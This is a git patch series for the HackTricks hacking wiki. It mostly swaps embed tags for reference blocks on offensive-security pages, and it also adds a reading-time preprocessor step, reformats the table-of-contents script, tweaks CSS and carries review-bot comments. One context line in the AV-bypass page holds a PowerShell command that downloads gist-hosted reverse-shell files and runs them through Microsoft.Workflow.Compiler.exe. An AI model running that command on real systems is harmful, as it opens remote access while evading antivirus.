@@ -1550,7 +1549,9 @@ shadow-dom.md ### Polyglots -{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xss_polyglots.txt" %} +{{#ref}} +https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xss_polyglots.txt +{{#endref}} ### Blind XSS payloads @@ -1619,7 +1620,9 @@ console.log( ### Brute-Force List -{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xss.txt" %} +{{#ref}} +https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xss.txt +{{#endref}} ## XSS Abusing other vulnerabilities @@ -1741,8 +1744,4 @@ other-js-tricks.md - [https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec](https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec) - [https://netsec.expert/2020/02/01/xss-in-2020.html](https://netsec.expert/2020/02/01/xss-in-2020.html) - {{#include ../../banners/hacktricks-training.md}} - - - diff --git a/src/pentesting-web/xxe-xee-xml-external-entity.md b/src/pentesting-web/xxe-xee-xml-external-entity.md index 953454955..e5688c52f 100644 --- a/src/pentesting-web/xxe-xee-xml-external-entity.md +++ b/src/pentesting-web/xxe-xee-xml-external-entity.md @@ -2,7 +2,6 @@ {{#include ../banners/hacktricks-training.md}} - ## XML Basics XML is a markup language designed for data storage and transport, featuring a flexible structure that allows for the use of descriptively named tags. It differs from HTML by not being limited to a set of predefined tags. XML's significance has declined with the rise of JSON, despite its initial role in AJAX technology. 
@@ -228,7 +227,9 @@ For more information check [https://portswigger.net/web-security/xxe/blind](http In the following awesome github repo you can find **paths of DTDs that can be present in the system**: -{% embed url="https://github.com/GoSecure/dtd-finder/tree/master/list" %} +{{#ref}} +https://github.com/GoSecure/dtd-finder/tree/master/list +{{#endref}} Moreover, if you have the **Docker image of the victim system**, you can use the tool of the same repo to **scan** the **image** and **find** the path of **DTDs** present inside the system. Read the [Readme of the github](https://github.com/GoSecure/dtd-finder) to learn how. @@ -764,7 +765,9 @@ XMLDecoder is a Java class that creates objects based on a XML message. If a mal ## Tools -{% embed url="https://github.com/luisfontes19/xxexploiter" %} +{{#ref}} +https://github.com/luisfontes19/xxexploiter +{{#endref}} ## References @@ -777,8 +780,4 @@ XMLDecoder is a Java class that creates objects based on a XML message. If a mal - [https://portswigger.net/web-security/xxe](https://portswigger.net/web-security/xxe)\\ - [https://gosecure.github.io/xxe-workshop/#7](https://gosecure.github.io/xxe-workshop/#7) - {{#include ../banners/hacktricks-training.md}} - - - diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2dlresolve.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2dlresolve.md index 25ca65ab0..8ac6193cd 100644 --- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2dlresolve.md +++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2dlresolve.md @@ -17,7 +17,9 @@ Usually, all these structures are faked by making an **initial ROP chain that ca You can find a better explanation about this technique in the second half of the video: -{% embed url="https://youtu.be/ADULSwnQs-s?feature=shared" %} +{{#ref}} +https://youtu.be/ADULSwnQs-s?feature=shared +{{#endref}} ## Structures 
@@ -63,6 +65,3 @@ p.interactive() - [https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve](https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve) {{#include ../../../banners/hacktricks-training.md}} - - - diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/srop-sigreturn-oriented-programming.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/srop-sigreturn-oriented-programming.md index 9de40c526..e68bf54bc 100644 --- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/srop-sigreturn-oriented-programming.md +++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/srop-sigreturn-oriented-programming.md @@ -21,7 +21,9 @@ rop-syscall-execv.md For a better explanation check also: -{% embed url="https://youtu.be/ADULSwnQs-s?feature=shared" %} +{{#ref}} +https://youtu.be/ADULSwnQs-s?feature=shared +{{#endref}} ## Example @@ -60,6 +62,3 @@ p.interactive() - [https://ir0nstone.gitbook.io/notes/types/stack/syscalls/sigreturn-oriented-programming-srop](https://ir0nstone.gitbook.io/notes/types/stack/syscalls/sigreturn-oriented-programming-srop) {{#include ../../../banners/hacktricks-training.md}} - - - diff --git a/src/reversing/reversing-tools-basic-methods/README.md b/src/reversing/reversing-tools-basic-methods/README.md index fb7c07bb3..3030415e1 100644 --- a/src/reversing/reversing-tools-basic-methods/README.md +++ b/src/reversing/reversing-tools-basic-methods/README.md @@ -166,7 +166,9 @@ cheat-engine.md ## ARM & MIPS -{% embed url="https://github.com/nongiach/arm_now" %} +{{#ref}} +https://github.com/nongiach/arm_now +{{#endref}} ## Shellcodes @@ -402,7 +404,9 @@ So, in this challenge, knowing the values of the buttons, you needed to **press ## Game Boy -{% embed url="https://www.youtube.com/watch?v=VVbRe7wr3G4" %} +{{#ref}} +https://www.youtube.com/watch?v=VVbRe7wr3G4 +{{#endref}} ## Courses 
@@ -410,6 +414,3 @@ So, in this challenge, knowing the values of the buttons, you needed to **press - [https://github.com/malrev/ABD](https://github.com/malrev/ABD) (Binary deobfuscation) {{#include ../../banners/hacktricks-training.md}} - - - diff --git a/src/stego/esoteric-languages.md b/src/stego/esoteric-languages.md index 9890075ce..e5f1ff05e 100644 --- a/src/stego/esoteric-languages.md +++ b/src/stego/esoteric-languages.md @@ -52,7 +52,9 @@ Take it to the top Whisper my world ``` -{% embed url="https://codewithrockstar.com/" %} +{{#ref}} +https://codewithrockstar.com/ +{{#endref}} ## PETOOH @@ -67,6 +69,3 @@ Kukarek ``` {{#include ../banners/hacktricks-training.md}} - - - diff --git a/src/todo/burp-suite.md b/src/todo/burp-suite.md index 927d53fa0..62d07e098 100644 --- a/src/todo/burp-suite.md +++ b/src/todo/burp-suite.md @@ -10,11 +10,10 @@ [https://github.com/0xC01DF00D/Collabfiltrator](https://github.com/0xC01DF00D/Collabfiltrator) : Payload to execute commands and grab the output via DNS requests to burpcollab. -{% embed url="https://medium.com/@ArtsSEC/burp-suite-exporter-462531be24e" %} +{{#ref}} +https://medium.com/@ArtsSEC/burp-suite-exporter-462531be24e +{{#endref}} [https://github.com/h3xstream/http-script-generator](https://github.com/h3xstream/http-script-generator) {{#include ../banners/hacktricks-training.md}} - - - diff --git a/src/todo/other-web-tricks.md b/src/todo/other-web-tricks.md index c2dfe55bc..17f71a89a 100644 --- a/src/todo/other-web-tricks.md +++ b/src/todo/other-web-tricks.md @@ -24,7 +24,9 @@ Register an email, before confirming it change the email, then, if the new confi ### Access Internal servicedesk of companies using atlassian -{% embed url="https://yourcompanyname.atlassian.net/servicedesk/customer/user/login" %} +{{#ref}} +https://yourcompanyname.atlassian.net/servicedesk/customer/user/login +{{#endref}} ### TRACE method 
@@ -33,6 +35,3 @@ Developers might forget to disable various debugging options in the production e ![Image for post](https://miro.medium.com/max/1330/1*wDFRADTOd9Tj63xucenvAA.png) {{#include ../banners/hacktricks-training.md}} - - - diff --git a/src/todo/references.md b/src/todo/references.md index 7b4e414f8..eb3792a1f 100644 --- a/src/todo/references.md +++ b/src/todo/references.md 
@@ -1,52 +1,95 @@ {{#include ../banners/hacktricks-training.md}} -{% embed url="https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/#python-tty-shell-trick" %} +{{#ref}} +https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/#python-tty-shell-trick +{{#endref}} -{% embed url="https://hausec.com/pentesting-cheatsheet/#_Toc475368982" %} +{{#ref}} +https://hausec.com/pentesting-cheatsheet/#_Toc475368982 +{{#endref}} -{% embed url="https://anhtai.me/pentesting-cheatsheet/" %} +{{#ref}} +https://anhtai.me/pentesting-cheatsheet/ +{{#endref}} -{% embed url="https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html" %} +{{#ref}} +https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html +{{#endref}} -{% embed url="https://ired.team/offensive-security-experiments/offensive-security-cheetsheets" %} +{{#ref}} +https://ired.team/offensive-security-experiments/offensive-security-cheetsheets +{{#endref}} -{% embed url="https://chryzsh.gitbooks.io/pentestbook/basics_of_windows.html" %} +{{#ref}} +https://chryzsh.gitbooks.io/pentestbook/basics_of_windows.html +{{#endref}} -{% embed url="https://github.com/wwong99/pentest-notes/blob/master/oscp_resources/OSCP-Survival-Guide.md" %} +{{#ref}} +https://github.com/wwong99/pentest-notes/blob/master/oscp_resources/OSCP-Survival-Guide.md +{{#endref}} -{% embed url="https://anhtai.me/oscp-fun-guide/" %} +{{#ref}} +https://anhtai.me/oscp-fun-guide/ +{{#endref}} -{% embed url="https://www.thehacker.recipes/" %} +{{#ref}} +https://www.thehacker.recipes/ +{{#endref}} -{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings" %} +{{#ref}} +https://github.com/swisskyrepo/PayloadsAllTheThings +{{#endref}} -{% embed url="https://gtfobins.github.io/" %} +{{#ref}} +https://gtfobins.github.io/ +{{#endref}} -{% embed url="https://github.com/RistBS/Awesome-RedTeam-Cheatsheet" %} +{{#ref}} +https://github.com/RistBS/Awesome-RedTeam-Cheatsheet +{{#endref}} -{% embed 
url="https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet" %} +{{#ref}} +https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet +{{#endref}} -{% embed url="https://hideandsec.sh/" %} +{{#ref}} +https://hideandsec.sh/ +{{#endref}} -{% embed url="https://cheatsheet.haax.fr/" %} +{{#ref}} +https://cheatsheet.haax.fr/ +{{#endref}} -{% embed url="https://infosecwriteups.com/" %} +{{#ref}} +https://infosecwriteups.com/ +{{#endref}} -{% embed url="https://www.exploit-db.com/" %} +{{#ref}} +https://www.exploit-db.com/ +{{#endref}} -{% embed url="https://wadcoms.github.io/" %} +{{#ref}} +https://wadcoms.github.io/ +{{#endref}} -{% embed url="https://lolbas-project.github.io" %} +{{#ref}} +https://lolbas-project.github.io +{{#endref}} -{% embed url="https://pentestbook.six2dez.com/" %} +{{#ref}} +https://pentestbook.six2dez.com/ +{{#endref}} -{% embed url="https://www.hackingarticles.in/" %} +{{#ref}} +https://www.hackingarticles.in/ +{{#endref}} -{% embed url="https://pentestlab.blog/" %} +{{#ref}} +https://pentestlab.blog/ +{{#endref}} -{% embed url="https://ippsec.rocks/" %} +{{#ref}} +https://ippsec.rocks/ +{{#endref}} {{#include ../banners/hacktricks-training.md}} - - - diff --git a/src/windows-hardening/active-directory-methodology/README.md b/src/windows-hardening/active-directory-methodology/README.md index 6411fe2fe..06d85c06c 100644 --- a/src/windows-hardening/active-directory-methodology/README.md +++ b/src/windows-hardening/active-directory-methodology/README.md @@ -684,7 +684,9 @@ rdp-sessions-abuse.md ## AD -> Azure & Azure -> AD -{% embed url="https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-lateral-movements/azure-ad-connect-hybrid-identity" %} +{{#ref}} +https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-lateral-movements/azure-ad-connect-hybrid-identity +{{#endref}} ## Some General Defenses 
@@ -721,6 +723,3 @@ rdp-sessions-abuse.md - [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/child-domain-da-to-ea-in-parent-domain](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/child-domain-da-to-ea-in-parent-domain) {{#include ../../banners/hacktricks-training.md}} - - - diff --git a/src/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md b/src/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md index 5aadead6b..cc259f585 100644 --- a/src/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md +++ b/src/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md @@ -55,7 +55,9 @@ If an attacker has already compromised a computer with [Unconstrained Delegation ## RCP Force authentication -{% embed url="https://github.com/p0dalirius/Coercer" %} +{{#ref}} +https://github.com/p0dalirius/Coercer +{{#endref}} ## PrivExchange @@ -128,6 +130,3 @@ If you can capture [NTLMv1 challenges read here how to crack them](../ntlm/#ntlm &#xNAN;_Remember that in order to crack NTLMv1 you need to set Responder challenge to "1122334455667788"_ {{#include ../../banners/hacktricks-training.md}} - - - diff --git a/src/windows-hardening/authentication-credentials-uac-and-efs.md b/src/windows-hardening/authentication-credentials-uac-and-efs.md index 6c0413bf2..242fe5e6b 100644 --- a/src/windows-hardening/authentication-credentials-uac-and-efs.md +++ b/src/windows-hardening/authentication-credentials-uac-and-efs.md @@ -140,7 +140,9 @@ This way requires the **victim user** to be **running** a **process** inside the #### Knowing the users password -{% embed url="https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files" %} +{{#ref}} +https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files +{{#endref}} ## Group Managed Service Accounts (gMSA) 
@@ -264,8 +266,4 @@ The SSPI will be in charge of finding the adequate protocol for two machines tha windows-security-controls/uac-user-account-control.md {{#endref}} - {{#include ../banners/hacktricks-training.md}} - - - diff --git a/src/windows-hardening/authentication-credentials-uac-and-efs/README.md b/src/windows-hardening/authentication-credentials-uac-and-efs/README.md index 157a35998..52ae38167 100644 --- a/src/windows-hardening/authentication-credentials-uac-and-efs/README.md +++ b/src/windows-hardening/authentication-credentials-uac-and-efs/README.md @@ -140,7 +140,9 @@ This way requires the **victim user** to be **running** a **process** inside the #### Knowing the users password -{% embed url="https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files" %} +{{#ref}} +https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files +{{#endref}} ## Group Managed Service Accounts (gMSA) @@ -265,6 +267,3 @@ uac-user-account-control.md {{#endref}} {{#include ../../banners/hacktricks-training.md}} - - - diff --git a/src/windows-hardening/av-bypass.md b/src/windows-hardening/av-bypass.md index 5908cc513..3b7ea72fd 100644 --- a/src/windows-hardening/av-bypass.md +++ b/src/windows-hardening/av-bypass.md @@ -2,7 +2,6 @@ {{#include ../banners/hacktricks-training.md}} - **This page was written by** [**@m2rc_p**](https://twitter.com/m2rc_p)**!** ## **AV Evasion Methodology** 
@@ -313,11 +312,15 @@ Every environment you go against will have their own strengths and weaknesses. I highly encourage you go watch this talk from [@ATTL4S](https://twitter.com/DaniLJ94), to get a foothold into more Advanced Evasion techniques. -{% embed url="https://vimeo.com/502507556?embedded=true&owner=32913914&source=vimeo_logo" %} +{{#ref}} +https://vimeo.com/502507556?embedded=true&owner=32913914&source=vimeo_logo +{{#endref}} his is also another great talk from [@mariuszbit](https://twitter.com/mariuszbit) about Evasion in Depth. -{% embed url="https://www.youtube.com/watch?v=IbA7Ung39o4" %} +{{#ref}} +https://www.youtube.com/watch?v=IbA7Ung39o4 +{{#endref}} ## **Old Techniques** @@ -512,7 +515,9 @@ powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.g powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell ``` -{% embed url="https://gist.github.com/BankSecurity/469ac5f9944ed1b8c39129dc0037bb8f" %} +{{#ref}} +https://gist.github.com/BankSecurity/469ac5f9944ed1b8c39129dc0037bb8f +{{#endref}} C# obfuscators list: [https://github.com/NotPrab/.NET-Obfuscator](https://github.com/NotPrab/.NET-Obfuscator) @@ -566,8 +571,4 @@ https://github.com/praetorian-code/vulcan - [https://github.com/persianhydra/Xeexe-TopAntivirusEvasion](https://github.com/persianhydra/Xeexe-TopAntivirusEvasion) - {{#include ../banners/hacktricks-training.md}} - - - 
diff --git a/src/windows-hardening/windows-local-privilege-escalation/README.md b/src/windows-hardening/windows-local-privilege-escalation/README.md index 27d45f03f..74bc41445 100644 --- a/src/windows-hardening/windows-local-privilege-escalation/README.md +++ b/src/windows-hardening/windows-local-privilege-escalation/README.md @@ -1544,7 +1544,9 @@ If you manages to **hijack a dll** being **loaded** by a **process** running as ### **From Administrator or Network Service to System** -{% embed url="https://github.com/sailay1996/RpcSsImpersonator" %} +{{#ref}} +https://github.com/sailay1996/RpcSsImpersonator +{{#endref}} ### From LOCAL SERVICE or NETWORK SERVICE to full privs @@ -1618,6 +1620,3 @@ C:\Windows\microsoft.net\framework\v4.0.30319\MSBuild.exe -version #Compile the - [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#antivirus--detections](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#antivirus--detections) {{#include ../../banners/hacktricks-training.md}} - - - diff --git a/src/windows-hardening/windows-local-privilege-escalation/juicypotato.md b/src/windows-hardening/windows-local-privilege-escalation/juicypotato.md index 1cd154432..cf8ea738f 100644 --- a/src/windows-hardening/windows-local-privilege-escalation/juicypotato.md +++ b/src/windows-hardening/windows-local-privilege-escalation/juicypotato.md 
@@ -2,8 +2,7 @@ {{#include ../../banners/hacktricks-training.md}} -> [!WARNING] -> **JuicyPotato doesn't work** on Windows Server 2019 and Windows 10 build 1809 onwards. However, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato) can be used to **leverage the same privileges and gain `NT AUTHORITY\SYSTEM`** level access. _**Check:**_ +> [!WARNING] > **JuicyPotato doesn't work** on Windows Server 2019 and Windows 10 build 1809 onwards. However, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato) can be used to **leverage the same privileges and gain `NT AUTHORITY\SYSTEM`** level access. _**Check:**_ {{#ref}} roguepotato-and-printspoofer.md @@ -114,7 +113,9 @@ c:\Users\Public> Oftentimes, the default CLSID that JuicyPotato uses **doesn't work** and the exploit fails. Usually, it takes multiple attempts to find a **working CLSID**. To get a list of CLSIDs to try for a specific operating system, you should visit this page: -{% embed url="https://ohpe.it/juicy-potato/CLSID/" %} +{{#ref}} +https://ohpe.it/juicy-potato/CLSID/ +{{#endref}} ### **Checking CLSIDs** @@ -131,6 +132,3 @@ Then download [test_clsid.bat ](https://github.com/ohpe/juicy-potato/blob/master - [https://github.com/ohpe/juicy-potato/blob/master/README.md](https://github.com/ohpe/juicy-potato/blob/master/README.md) {{#include ../../banners/hacktricks-training.md}} - - - From fd207cb6b1d675d4e8d54f2629847e332ccace9a Mon Sep 17 00:00:00 2001 From: Congon4tor Date: Fri, 3 Jan 2025 02:51:33 +0100 Subject: [PATCH 2/5] Add reat time using preprocessor --- hacktricks-preprocessor.py | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/hacktricks-preprocessor.py b/hacktricks-preprocessor.py index fedfdef99..0a916cbfc 100644 
--- a/hacktricks-preprocessor.py
+++ b/hacktricks-preprocessor.py
@@ -69,6 +69,12 @@ def ref(matchobj):
 return result
 
 
+def add_read_time(content):
+ regex = r'(# .*(?=\n))'
+ new_content = re.sub(regex, lambda x: x.group(0) + "\n\nReading time: {{ #reading_time }}", content)
+ return new_content
+
+
 def iterate_chapters(sections):
 if isinstance(sections, dict) and "PartTitle" in sections: # Not a chapter section
 return
@@ -99,6 +105,7 @@ if __name__ == '__main__':
 current_chapter = chapter
 regex = r'{{[\s]*#ref[\s]*}}(?:\n)?([^\\\n]*)(?:\n)?{{[\s]*#endref[\s]*}}'
 new_content = re.sub(regex, ref, chapter['content'])
+ new_content = add_read_time(new_content)
 chapter['content'] = new_content
 
 content = json.dumps(book)
From 9fcbdf80948e6ede7104ef16dd0e15fc377bb23e Mon Sep 17 00:00:00 2001
From: Congon4tor
Date: Fri, 3 Jan 2025 02:53:36 +0100
Subject: [PATCH 3/5] fix read time in readme

---
 src/README.md | 7 +------
 1 file changed, 1 insertion(+), 6 deletions(-)

diff --git a/src/README.md b/src/README.md
index fae21c7b3..6a9ff97b7 100644
--- a/src/README.md
+++ b/src/README.md
@@ -1,13 +1,10 @@
 # HackTricks
 
-Reading time: {{ #reading_time }}
-
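Review bot: `add_read_time`'s pattern `r'(# .*(?=\n))'` is neither anchored to a line start nor limited to a single match, so `re.sub` appends `Reading time: {{ #reading_time }}` after every `# …` run that ends a line — shell comments inside fenced code blocks, or a `# ` in the middle of a sentence — rather than only after the page title. Anchoring to the first level-1 heading expresses the intent: `new_content = re.sub(r'^# .*$', lambda m: m.group(0) + "\n\nReading time: {{ #reading_time }}", content, count=1, flags=re.MULTILINE)`. The function also has no docstring; `"""Insert a reading-time marker after the page's first level-1 heading."""` plus a note that `{{ #reading_time }}` is expanded by a later step (not visible here) would tell the next maintainer what the inserted text is expected to become. The same pattern is revised again in the last commit of this series, where the anchoring point still applies.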
_Hacktricks logos & motion design by_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._ -> [!TIP] -> **Welcome to the wiki where you will find each hacking trick/technique/whatever I have learnt from CTFs, real life apps, reading researches, and news.** +> [!TIP] > **Welcome to the wiki where you will find each hacking trick/technique/whatever I have learnt from CTFs, real life apps, reading researches, and news.** To get started follow this page where you will find the **typical flow** that **you should follow when pentesting** one or more **machines:** @@ -154,5 +151,3 @@ welcome/hacktricks-values-and-faq.md ![HackTricks Github Stats](https://repobeats.axiom.co/api/embed/68f8746802bcf1c8462e889e6e9302d4384f164b.svg) {{#include ./banners/hacktricks-training.md}} - - From 47ba2ab451028a541657ba314e8066487bc28f3c Mon Sep 17 00:00:00 2001 From: Congon4tor Date: Fri, 3 Jan 2025 03:30:44 +0100 Subject: [PATCH 4/5] Fix page index with links --- theme/pagetoc.js | 96 ++++++++++++++++++++++++++---------------------- 1 file changed, 52 insertions(+), 44 deletions(-) diff --git a/theme/pagetoc.js b/theme/pagetoc.js index 5962db9f3..a51ea29ae 100644 --- a/theme/pagetoc.js +++ b/theme/pagetoc.js 
@@ -1,68 +1,76 @@ -let scrollTimeout; +let scrollTimeout const listenActive = () => { - const elems = document.querySelector(".pagetoc").children; - [...elems].forEach(el => { + const elems = document.querySelector(".pagetoc").children + ;[...elems].forEach((el) => { el.addEventListener("click", (event) => { - clearTimeout(scrollTimeout); - [...elems].forEach(el => el.classList.remove("active")); - el.classList.add("active"); + clearTimeout(scrollTimeout) + ;[...elems].forEach((el) => el.classList.remove("active")) + el.classList.add("active") // Prevent scroll updates for a short period scrollTimeout = setTimeout(() => { - scrollTimeout = null; - }, 100); // Adjust timing as needed - }); - }); -}; + scrollTimeout = null + }, 100) // Adjust timing as needed + }) + }) +} -const getPagetoc = () => document.querySelector(".pagetoc") || autoCreatePagetoc(); +const getPagetoc = () => + document.querySelector(".pagetoc") || autoCreatePagetoc() const autoCreatePagetoc = () => { - const main = document.querySelector("#content > main"); + const main = document.querySelector("#content > main") const content = Object.assign(document.createElement("div"), { - className: "content-wrap" - }); - content.append(...main.childNodes); - main.prepend(content); - main.insertAdjacentHTML("afterbegin", '
'); - return document.querySelector(".pagetoc"); -}; + className: "content-wrap", + }) + content.append(...main.childNodes) + main.prepend(content) + main.insertAdjacentHTML( + "afterbegin", + '
' + ) + return document.querySelector(".pagetoc") +} const updateFunction = () => { - if (scrollTimeout) return; // Skip updates if within the cooldown period from a click - const headers = [...document.getElementsByClassName("header")]; - const scrolledY = window.scrollY; - let lastHeader = null; + if (scrollTimeout) return // Skip updates if within the cooldown period from a click + const headers = [...document.getElementsByClassName("header")] + const scrolledY = window.scrollY + let lastHeader = null // Find the last header that is above the current scroll position for (let i = headers.length - 1; i >= 0; i--) { if (scrolledY >= headers[i].offsetTop) { - lastHeader = headers[i]; - break; + lastHeader = headers[i] + break } } - const pagetocLinks = [...document.querySelector(".pagetoc").children]; - pagetocLinks.forEach(link => link.classList.remove("active")); + const pagetocLinks = [...document.querySelector(".pagetoc").children] + pagetocLinks.forEach((link) => link.classList.remove("active")) if (lastHeader) { - const activeLink = pagetocLinks.find(link => lastHeader.href === link.href); - if (activeLink) activeLink.classList.add("active"); + const activeLink = pagetocLinks.find( + (link) => lastHeader.href === link.href + ) + if (activeLink) activeLink.classList.add("active") } -}; +} -window.addEventListener('load', () => { - const pagetoc = getPagetoc(); - const headers = [...document.getElementsByClassName("header")]; - headers.forEach(header => { +window.addEventListener("load", () => { + const pagetoc = getPagetoc() + const headers = [...document.getElementsByClassName("header")] + headers.forEach((header) => { const link = Object.assign(document.createElement("a"), { textContent: header.text, href: header.href, - className: `pagetoc-${header.parentElement.tagName}` - }); - pagetoc.appendChild(link); - }); - updateFunction(); - listenActive(); - window.addEventListener("scroll", updateFunction); -}); - + className: 
`pagetoc-${header.parentElement.tagName}`,
+ })
+ if (header.parentElement.querySelectorAll("a").length === 2) {
+ link.textContent = header.parentElement.querySelectorAll("a")[1].text
+ }
+ pagetoc.appendChild(link)
+ })
+ updateFunction()
+ listenActive()
+ window.addEventListener("scroll", updateFunction)
+})
From d8cff20f33bc2164c875ec008dd57af7ea725c74 Mon Sep 17 00:00:00 2001
From: Congon4tor
Date: Fri, 3 Jan 2025 14:16:27 +0100
Subject: [PATCH 5/5] Style tables

---
 hacktricks-preprocessor.py | 2 +-
 theme/css/chrome.css | 2 +-
 theme/css/variables.css | 6 +++---
 theme/pagetoc.css | 2 +-
 4 files changed, 6 insertions(+), 6 deletions(-)

diff --git a/hacktricks-preprocessor.py b/hacktricks-preprocessor.py
index 0a916cbfc..b3186537d 100644
--- a/hacktricks-preprocessor.py
+++ b/hacktricks-preprocessor.py
@@ -70,7 +70,7 @@ def ref(matchobj):
 
 
 def add_read_time(content):
- regex = r'(# .*(?=\n))'
+ regex = r'(<\/style>\n# .*(?=\n))'
 new_content = re.sub(regex, lambda x: x.group(0) + "\n\nReading time: {{ #reading_time }}", content)
 return new_content
 
diff --git a/theme/css/chrome.css b/theme/css/chrome.css
index ead7ee881..33b17c61f 100644
--- a/theme/css/chrome.css
+++ b/theme/css/chrome.css
@@ -835,7 +835,7 @@ html:not(.sidebar-resizing) .sidebar {
 border-top: 1px solid var(--table-border-color);
 margin-top: 1rem;
 align-content: center;
- z-index: 101;
+ z-index: 106;
 }
 .footer .theme-wrapper {
 max-width: var(--container-max-width);
diff --git a/theme/css/variables.css b/theme/css/variables.css
index fbe328e4d..5aa7b2f5b 100644
--- a/theme/css/variables.css
+++ b/theme/css/variables.css
@@ -343,8 +343,8 @@
 --warning-border: #ff8e00;
 --table-border-color: #2f2f2f;
- --table-header-bg: hsl(226, 23%, 31%);
- --table-alternate-bg: hsl(226, 23%, 14%);
+ --table-header-bg: #2f2f2f;
+ --table-alternate-bg: #222222;
 --searchbar-border-color: #2f2f2f;
 --searchbar-bg: hsl(0, 0%, 11%);
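Review bot: The functional fix — using the second anchor's text when a heading's text is itself a link — is three lines inside a whole-file reformat (semicolons removed, arrow parameters parenthesised, lines rewrapped), which makes the change hard to review and to bisect; putting the reformat in its own commit is the usual practice. In the fix, `header.parentElement.querySelectorAll("a")` is evaluated twice; `const anchors = header.parentElement.querySelectorAll("a")` followed by `if (anchors.length === 2) link.textContent = anchors[1].text` reads better. The `=== 2` presumably encodes "heading anchor plus exactly one link", and a heading with more links silently keeps `header.text`, so a comment such as `// heading text is itself a link: show the link's text rather than the header anchor's` would document the assumption — whether the header anchor's own text is empty in that case is not visible here. The markup passed to `insertAdjacentHTML` was stripped from this rendering, so that part of the hunk cannot be checked.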
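Review bot: The new pattern `r'(<\/style>\n# .*(?=\n))'` makes the reading-time insertion depend on a `</style>` line immediately preceding the H1, and it is still neither line-anchored nor limited to one match. src/README.md, whose hand-written reading-time line was removed in the previous commit, starts directly with `# HackTricks`, so unless an earlier step prepends a style block it now gets no reading time at all; the pages touched earlier in this series show the banner include after the title, so where the `</style>` comes from is not visible here. If the intent is "the first top-level heading", `re.sub(r'^# .*$', …, content, count=1, flags=re.MULTILINE)` expresses that without the coupling; if the `</style>` dependency is deliberate, a comment naming the step that emits it, e.g. `# the H1 is expected to follow the inline <style> block produced by <STEP-NAME>`, would keep the next maintainer from breaking it.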
@@ -429,7 +429,7 @@
 --warning-border: #ff8e00;
 --table-border-color: hsl(0, 0%, 95%);
- --table-header-bg: hsl(0, 0%, 80%);
+ --table-header-bg: hsl(0, 0%, 95%);
 --table-alternate-bg: hsl(0, 0%, 97%);
 --searchbar-border-color: #aaa;
diff --git a/theme/pagetoc.css b/theme/pagetoc.css
index d979c7427..17293c36f 100644
--- a/theme/pagetoc.css
+++ b/theme/pagetoc.css
@@ -72,7 +72,7 @@
 .sidetoc-wrapper {
 position: fixed;
 width: 250px;
- height: calc(100vh - var(--menu-bar-height) - 25px * 2);
+ height: calc(100vh - var(--menu-bar-height) - 50px * 2);
 overflow: auto;
 display: flex;
 flex-direction: column;